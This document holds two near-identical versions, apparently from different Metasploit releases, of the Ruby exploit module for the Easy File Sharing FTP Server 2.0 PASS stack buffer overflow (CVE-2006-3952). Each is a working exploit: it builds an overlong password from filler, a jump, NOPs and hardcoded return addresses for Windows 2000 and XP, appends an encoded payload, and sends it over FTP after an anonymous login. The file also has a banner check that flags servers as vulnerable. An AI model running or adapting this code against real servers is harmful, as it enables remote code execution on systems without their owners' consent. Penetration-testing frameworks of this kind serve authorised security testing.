==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/ftp/easyfilesharing_pass.rb <==
##
# $Id: easyfilesharing_pass.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Easy File Sharing 2.0
				service. By sending an overly long password, an attacker can execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2006-3952' ],
					[ 'OSVDB', '27646' ],
					[ 'BID', '19243' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
					[
						[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
						[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
					],
			'DisclosureDate' => 'Jul 31 2006',
			'DefaultTarget'  => 0))
	end

   def check
      connect
      disconnect

      if (banner =~ /Easy File Sharing FTP Server/)
         return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Safe
   end
	
	def exploit
		connect

		filler =  rand_text_english(2559) + "\xeb\x12" 
		filler << make_nops(2) + [target.ret].pack('V')
 
		sploit = "\x2c" + filler + payload.encoded  

		print_status("Trying target #{target.name}...")

		# needs anonymous to be set.
		send_cmd(['USER', "anonymous"], true)
		send_cmd(['PASS', sploit], false)
		
		handler
		disconnect
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/ftp/easyfilesharing_pass.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Easy File Sharing 2.0
				service. By sending an overly long password, an attacker can execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-3952' ],
					[ 'OSVDB', '27646' ],
					[ 'BID', '19243' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'DisclosureDate' => 'Jul 31 2006',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Easy File Sharing FTP Server/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		filler =  rand_text_english(2559) + "\xeb\x12"
		filler << make_nops(2) + [target.ret].pack('V')

		sploit = "\x2c" + filler + payload.encoded

		print_status("Trying target #{target.name}...")

		# needs anonymous to be set.
		send_cmd(['USER', "anonymous"], true)
		send_cmd(['PASS', sploit], false)

		handler
		disconnect
	end

end
